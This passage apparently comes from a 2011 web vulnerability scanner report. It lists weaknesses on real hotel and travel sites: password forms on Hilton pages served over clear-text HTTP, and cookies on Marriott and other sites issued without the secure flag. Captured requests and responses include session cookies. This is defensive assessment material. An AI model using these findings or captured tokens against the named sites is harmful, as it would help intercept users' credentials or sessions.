7.13. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/localguide.do

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/localguide.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/localguide.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:05 GMT;path=/
Content-Length: 47470


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...

7.14. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/services.do

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/services.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/services.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:13 GMT;path=/
Content-Length: 45350


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...

7.15. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH/index.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /en_US/hi/hotel/BOSLHHH/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789615,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149& HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; NSC_qse-qgt=44153d5f3660; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.996; mmid=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635640479:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 12:53:40 GMT
Content-Length: 84951
Connection: close
Vary: Accept-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:04:40 GMT;path=/


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...

7.16. http://www1.hilton.com/en_US/hi/index.do

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/index.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /en_US/hi/index.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 57662
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:52:41 GMT
Connection: close
Set-Cookie: cross-sell=hi; Domain=hilton.com; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:03:41 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="msapplication-st
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...

7.17. http://www1.hilton.com/en_US/hi/index.do

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/index.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /en_US/hi/index.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 57662
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:52:41 GMT
Connection: close
Set-Cookie: cross-sell=hi; Domain=hilton.com; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:03:41 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="msapplication-st
...[SNIP]...
<div id="myreservations" style="display:none;">
           
           
                                                                           <form name="myForm" id="myForm" method="post">
               <div class="containReservationsOptions">
...[SNIP]...
</label><input id="Password_myRes" tabindex="9" name="password" class="frmTextMed" type="password">
                       </fieldset>
...[SNIP]...

7.18. http://www1.hilton.com/en_US/hi/sitemap/index.do

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/sitemap/index.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /en_US/hi/sitemap/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:03:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:14:47 GMT;path=/
Content-Length: 36912


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="m
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...

8. SSL cookie without secure flag set
There are 10 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


8.1. https://wwwa.applyonlinenow.com/USCCapp/Ctl/entry

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://wwwa.applyonlinenow.com
Path:   /USCCapp/Ctl/entry

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /USCCapp/Ctl/entry HTTP/1.1
Host: wwwa.applyonlinenow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Found
Date: Mon, 03 Oct 2011 13:02:36 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2
Location: https://wwwa.applyonlinenow.com/USCCapp/static/error.html?error_code=1001
Content-Length: 0
Set-Cookie: JSESSIONID=0000EGXfhNLdzAH9vr8PmirVHqD:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/plain; charset=ISO-8859-1
Content-Language: en-US


8.2. https://www.cruisesonly.com/bcss/default.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cruisesonly.com
Path:   /bcss/default.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bcss/default.asp?bn=88888888&ln=xss&custservice_submit.x=10&custservice_submit.y=8&custservice_submit=Y&CID=6386 HTTP/1.1
Host: www.cruisesonly.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/cs/default.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; AFF%5FCID=%22%22; sid=6386; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 46341
Content-Type: text/html
Set-Cookie: partnerStamp=21960764; domain=; path=/
Set-Cookie: AFF%5FCID=6386; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Cache-control: private
Content-Length: 46341


   <script language="Javascript" src="/lib/javascript/validation/messagingobjects.js"></script>
<script language="javascript" src="/code/javascript/JSPopup.js"></script>
   <script languag
...[SNIP]...

8.3. https://www.marriott.com/!crd_prm!.!cm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /!crd_prm!.!cm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /!crd_prm!.!cm?crd_ver=0.9.5&crd_rnd=508779&crd_cnt=0.01&crd_tpb=1317646588001&crd_olt=7782 HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.marriott.com/reservation/availability.mi?isSearch=true&propertyCode=BOSLA
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; JVMID=pEbizMdcomD167_prd1; MI_SITE=prod3; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; s_pers=%20s_lv%3D1317646590532%7C1412254590532%3B%20s_lv_s%3DFirst%2520Visit%7C1317648390532%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":2,"to":5,"c":"http://www.marriott.com/search/findHotels.mi","lc":{"d4":{"v":2,"s":true,"e":1}},"cd":4,"sd":4,"f":1317646586583}; fsr.a=1317646594850

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Wed, 20 Apr 2011 13:16:59 GMT
ETag: "c001-327-708888c0"
Accept-Ranges: bytes
Content-Length: 807
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/plain
Date: Mon, 03 Oct 2011 12:56:23 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: MI_SITE=prod3;path=/

GIF89a....................................................................................................................................3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f....
...[SNIP]...

8.4. https://www.marriott.com/default.mi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /default.mi

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.mi HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.marriott.com/reservation/expiredSession.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":4,"to":5,"c":"https://www.marriott.com/reservation/expiredSession.mi","lc":{"d4":{"v":4,"s":true,"e":3}},"cd":4,"sd":4,"f":1317646766835}; s_pers=%20s_lv%3D1317646786238%7C1412254786238%3B%20s_lv_s%3DFirst%2520Visit%7C1317648586238%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dmarriottglobal%253D%252526pid%25253Dwww.marriott.com/reservation/expiredSession.mi%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.marriott.com/reservation/cleanSession.mi%2525253Furl%2525253D/%25252526marshaTimeOut%2525253Dfalse%252526ot%25253DA%3B; JVMID=pEbizMdcomD167_prd1; MI_SITE=prod3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Date: Mon, 03 Oct 2011 12:59:27 GMT
Content-Length: 99910
Connection: keep-alive


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   

<html xmlns="http://www.w3.org/1999/x
...[SNIP]...

8.5. https://www.marriott.com/reservation/availability.mi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /reservation/availability.mi

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /reservation/availability.mi?isSearch=true&propertyCode=BOSLA HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.marriott.com/search/findHotels.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; JVMID=pEbizMdcomD167_prd1; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; ctcData=searchCount_0*resAmount_0*inByTomorrow_false*city_BOS*state_MA*country_US*; MI_SITE=prod3; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":2,"to":5,"c":"http://www.marriott.com/search/findHotels.mi","lc":{"d4":{"v":2,"s":true,"e":1}},"cd":4,"sd":4,"f":1317646556133}; IS3_History=1317397011-1-67_16-1-__16_; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; s_pers=%20s_lv%3D1317646581955%7C1412254581955%3B%20s_lv_s%3DFirst%2520Visit%7C1317648381955%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dmarriottglobal%253D%252526pid%25253Dwww.marriott.com/search/findHotels.mi%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.marriott.com/reservation/availability.mi%2525253FisSearch%2525253Dtrue%25252526propertyCode%2525253DBOSLA%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Pragma: no-cache
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Mon, 03 Oct 2011 12:56:19 GMT
Content-Length: 101861
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www
...[SNIP]...

8.6. https://www.marriott.com/reservation/availabilitySearch.mi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /reservation/availabilitySearch.mi

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /reservation/availabilitySearch.mi?isSearch=false HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
Content-Length: 566
Cache-Control: max-age=0
Origin: https://www.marriott.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.marriott.com/reservation/availability.mi?isSearch=true&propertyCode=BOSLA
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; JVMID=pEbizMdcomD167_prd1; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":3,"to":5,"c":"https://www.marriott.com/reservation/availability.mi","lc":{"d4":{"v":3,"s":true,"e":2}},"cd":4,"sd":4,"f":1317646586583}; MI_SITE=prod3; s_pers=%20s_lv%3D1317646762445%7C1412254762445%3B%20s_lv_s%3DFirst%2520Visit%7C1317648562445%3B

accountId=&fromDate=10%2F3%2F11&minDate=10%2F03%2F2011&maxDate=09%2F23%2F2012&monthNames=January%2CFebruary%2CMarch%2CApril%2CMay%2CJune%2CJuly%2CAugust%2CSeptember%2COctober%2CNovember%2CDecember&wee
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://www.marriott.com/reservation/expiredSession.mi
Content-Length: 0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 12:59:01 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/


8.7. https://www.marriott.com/reservation/cleanSession.mi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /reservation/cleanSession.mi

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /reservation/cleanSession.mi?url=/&marshaTimeOut=false HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.marriott.com/reservation/expiredSession.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; JVMID=pEbizMdcomD167_prd1; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":4,"to":5,"c":"https://www.marriott.com/reservation/expiredSession.mi","lc":{"d4":{"v":4,"s":true,"e":3}},"cd":4,"sd":4,"f":1317646766835}; MI_SITE=prod3; s_pers=%20s_lv%3D1317646786238%7C1412254786238%3B%20s_lv_s%3DFirst%2520Visit%7C1317648586238%3B; 